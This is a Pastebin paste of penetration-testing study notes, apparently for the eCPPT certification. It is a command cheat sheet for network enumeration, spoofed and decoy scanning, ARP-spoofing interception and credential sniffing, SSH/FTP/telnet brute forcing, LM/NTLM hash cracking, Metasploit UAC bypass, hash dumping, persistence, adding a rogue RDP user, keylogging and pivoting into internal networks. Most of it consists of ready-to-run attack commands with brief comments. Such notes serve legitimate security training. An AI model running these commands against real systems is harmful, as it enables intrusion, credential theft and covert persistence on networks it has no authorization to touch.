API tools faq
paste
Guest User

Untitled

a guest
Jun 15th, 2018
851
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.19 KB | None | 0 0
raw download clone embed print report
  1. eCPPT NETWORK SECURITY
  2.  
  3. *DNS Enumeration
  4.  
  5. nslookup example.com
  6. nslookup -query=mx domain
  7. nslookup -query=ns domain
  8. nslookup -query=any domain
  9.  
  10. interactime mode {
  11. set q=ns domain
  12. set q=mx domain
  13. set q=cname domain
  14. }
  15.  
  16. dig domain
  17. dig domain A
  18. dig domain NS
  19. dig +nocmd domain MX +noall +answer
  20. dig +nocmd domain MX +noall +answer
  21. dig +nocmd domain AXFR +noall +answer @vulnDNS
  22.  
  23. fierce -dns domain
  24. fierce -dns domain -dnsserver vuln.DNS
  25.  
  26. dnsenum domain
  27. dnsenum domain --dnsserver vuln.DNS
  28. dnsenum domain -f host.list
  29.  
  30. dnsmap domain
  31. dnsrecon -d domain
  32.  
  33. *NETBIOS
  34. windows commands
  35.  
  36. nbtstat -A $IP
  37. net view $IP
  38. net use /?
  39. net use \\resource\path
  40.  
  41. ** net bios auditing tool **
  42. nat.exe -u userlist -p passwordlist $IP
  43. winfingerprint GUI tool
  44.  
  45. NULLSESSION
  46. net use \\source\ipc$ "" /user:"
  47.  
  48. SID2USER (replace - with " " )
  49. sid2user.exe \\source $SID
  50. sid2user.exe \\source $SID 500 (admin)
  51. sid2user.exe \\source $SID 501 (guest)
  52. sid2user.exe \\source $SID 1000 (account created by user)
  53.  
  54. dumpsec GUI tool
  55.  
  56. linux commands
  57.  
  58. *polenum
  59. *ldapscripts
  60.  
  61. enum4linux -a -v $IP
  62. smbclient -L $IP
  63. smbclient \\\\$IP\\folderToAccess
  64.  
  65. *SNMP Enumeration
  66.  
  67. snmpwalk -h
  68. snmpwalk -v -2c -c public $IP
  69. snmpwalk -v -2c -c public $IP hrSWInstalledName
  70. snmpwalk -v -2c -c public $IP hrMemorySize
  71. snmpwalk -v -2c -c public $IP sysContact
  72.  
  73. snmpset -v -2c -c public $IP sysContant.0 s value
  74. nmap -sU -p 161 --script snmp-win32-service $IP
  75. nmap -SU -p 161 --script snmp-brute $IP
  76. nmap -SU -p 161 --script snmp-win32-users $IP
  77.  
  78. SCANNING
  79.  
  80. *Idle Hping & nmap command
  81.  
  82. hping3 -S -r $IP -p 135 # syn scan
  83. if the target response with id +1 , that makes him a good zombie, in general status id must be incemented
  84.  
  85. hping3 -a $ZIP -S $VIP -p 23 #spoof IP
  86. zip = zombie , vip = victim...if the target response id +2 the 23 is open
  87.  
  88. nmap --script ipdseq $IP -p 135
  89. checks if the id status is incresed
  90. nmap -O -v $IP -p 135
  91.  
  92. nmap -sI $zip:135 $vip -p 23 --packet-trace
  93. zombie idle scan (-sI)
  94.  
  95. hping3 -S -r $vip -p 135 +
  96. nmap -S $zip $vip -p 23 -Pn -e eth0 -n --disable-arp-ping
  97. if the target response with incemented id then the port is open
  98.  
  99. *NMAP scan and NSE scripting
  100.  
  101. nmap --script-help "smb" and discovery
  102. how to search for nse scripts
  103.  
  104. nmap --script auth $IP
  105. runs all auth nse scripts
  106. nmap --script default $IP
  107.  
  108. nmap -f $vip -n -p80 --disable-arp-ping -Pn
  109. nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 100
  110. nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 48
  111. every fragment is sized of 8bytes
  112. nmap -f -f -sS $vip -p 80 -Pn -n --disable-arp-ping
  113. (every fragment is sized of 16bytes)
  114.  
  115. *Using Decoys (popular idle scans)
  116.  
  117. nmap -p 80 -D $dec1,ME,dec2 $vip
  118. nmap -D RND:10 $vip -sS -p 80 -Pn --disable-arp-ping
  119. hping3 --rand-source -S -p 80 $vip -c 3
  120. hping3 -a $spoofIP -S -p 80 $vip
  121. nmap --source-port 53 $vip -sS
  122. dns is mostly accepted in firewalls
  123. hping3 -S -s 53 --scan known $vip
  124. nmap -sS --data-lenght 10 -p 21 $vip
  125. hping3 -S -p 21 --data 24 $vip
  126. nmap --spoof-mac apple $vip -p 80 -Pn --disable-arp-ping -n
  127. nmap --spoof-mac 0 $vip -p 80 -Pn --disable-arp-ping -n
  128. nmap --spoof-mac 00:11:22:33:44:55 $vip -p 80 -Pn --disable-arp-ping -n
  129. nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts
  130. nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts -T2
  131. hping3 -1 --rand-dest 192.168.1.x -I eth0
  132. hping3 --scan 80,443,21,22 $vip -i u10
  133.  
  134. Man In The Middle ATTACKS
  135.  
  136. *SNIFFING TRAFFIC
  137.  
  138. tcpdump --help
  139. tcpdump -D // list interfaces
  140. tcpdump -i eth0
  141. tcpdump -i eth0 -v
  142. tcpdump -i eth0 -n //disable dns resolution
  143. tcpdump -i eth0 -q //quite option
  144. tcpdump -i eth0 host $IP //sniff spesific host or IP
  145. tcpdump -i eth0 src $sourceaddr dst $destinaddr
  146. tcpdump -i eth0 -F filter.file //file that conainer [port No]
  147. tcpdump -i eth0 -c 150 //packets we want to capture
  148. tcpdump -i eth0 -w output_file.txt //save output
  149. tcpdump -i eth0 -r output_file.txt //read output
  150. tcpdump -i eth0 | grep $IP
  151.  
  152. *MITM
  153.  
  154. Promiscuise mode allow network interface card to accept and process all packets receive
  155. Switch forward traffic only to the asked destination
  156. ettercap
  157. bettercap
  158. mitmf
  159. sslstrip
  160.  
  161. //enable ip forwarded
  162. echo 1 > /proc/sys/net/ipv4/ip_forward
  163.  
  164. //arp spoofing [2 way] [
  165. arpsoof -i eth0 -t $targetIP $impersonateIP
  166. arpsoof -i eth0 -t $impersonateIP $targetIP
  167. ]
  168.  
  169. dsniff -i eth0 //grabs basic auth credentials
  170.  
  171. bettercap -h
  172. bettercap -I eth0 -X -G $target1 -T $target2ip //sniffing mode
  173.  
  174. EXPLOITATION
  175.  
  176. *Auth Bruteforce
  177.  
  178. ncrack -vv -U userlist -P passlist 192.168.1.1 -p @telnet
  179. medusa -h 192.168.1.1 -M ssh -U userlist -P passlist
  180. hydra -L userlist -P passlist ssh://192.168.1.1
  181. hydra -L userlist -P passlist ssh://192.168.1.1 -T 50
  182. patator ftp_login -help
  183. patator ftp_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Login incorrect"
  184. patator ssh_login host=192.168.1.1 user="test" password="test"
  185. patator ssh_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ingonre:msg="Filter To Use"
  186. patator telnet_login inputs="FILE0\nFILE1\n" host= 192.168.1.1 0=userlist 1=passlist -x ingonre:msg="Filter To Use"
  187.  
  188. *LM_NTLM crack
  189.  
  190. use auxilirary/server/capture/smb
  191. set JOHNPWFILE hashes
  192.  
  193. rcracki_mt -h 8818c6a2a95684g4 -t 4 *.rti // we need wanbow table file , 8 bytes of LM hash (16chars) -t =>(thread)
  194.  
  195. netntlm --file /file/challenge_response --seed passdiscovered // recovers (if cracked) the password
  196. netntlm --file /file/challenge_response --seed fullpass // case sensitive
  197.  
  198. POST EXPLOITATION
  199.  
  200. *Privileges Escalation on Windows
  201.  
  202. > sysinfo
  203. > getprivs // list session priveleges
  204. > run post/windows/gather/win_privs // list all machine privileges and UAC status
  205. use epxloit/windows/local/bypassuac_injection // try to bypass the UAC
  206.  
  207. - exploit suggester
  208.  
  209. //external tools
  210. UACme
  211.  
  212. *Privileges Escalation on Linux
  213.  
  214. sysinfo
  215.  
  216. - exploit suggester
  217.  
  218. > execute -f /bin/sh -i -c // create a new channel and interacts with it
  219.  
  220. *Maintaine Access & persistance
  221. (inside meterpreter)
  222.  
  223. - migration to another service
  224. - hashdump OR post /windows/gather/smart_hashdump
  225. - psexec
  226.  
  227. Adding new user to remote system
  228.  
  229. - run getgui -e -u user -p pass //adding new user via RDP and enabled (connect via [ xfreerdp /v:$IP /u:$user /p:$pass
  230. - exploit/windows/local/persistence
  231.  
  232. *Pillaling
  233.  
  234. shell > systeminfo
  235. mptr > post/windows/gather/*
  236. > search -f *.kdb -r -d //searching for specific info
  237. > post/windows/capture/* //keyloger
  238. shell > ipconfig /all
  239. # > route OR+AND arp
  240. # > netstat -ano
  241. # > wmic ?
  242. # > wmic service /?
  243. # > wmic service get [caption,started]
  244. # > wmic service where started=true get caption
  245.  
  246. *Mapping Internal network
  247.  
  248. shell > ipconfig /all
  249. mtrp > arp & route
  250. shell > ipconfig /displaydns
  251. # > netstat -ano
  252. # > netstat -b
  253. msf > post/multi/gather/ping_sweep
  254. mtpr > run arp_scan -r $IP/*
  255. msf > post/windows/manage/autoroute // adding route so can scan internal network
  256. # > auxiliary/server/socks4a // configure socks proxy ( edite proxyxhains )
  257. mtpr > portfwd add -l 8080 -p 80 -r $Remote IP // l = local port , p = remote port , r = remote host
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!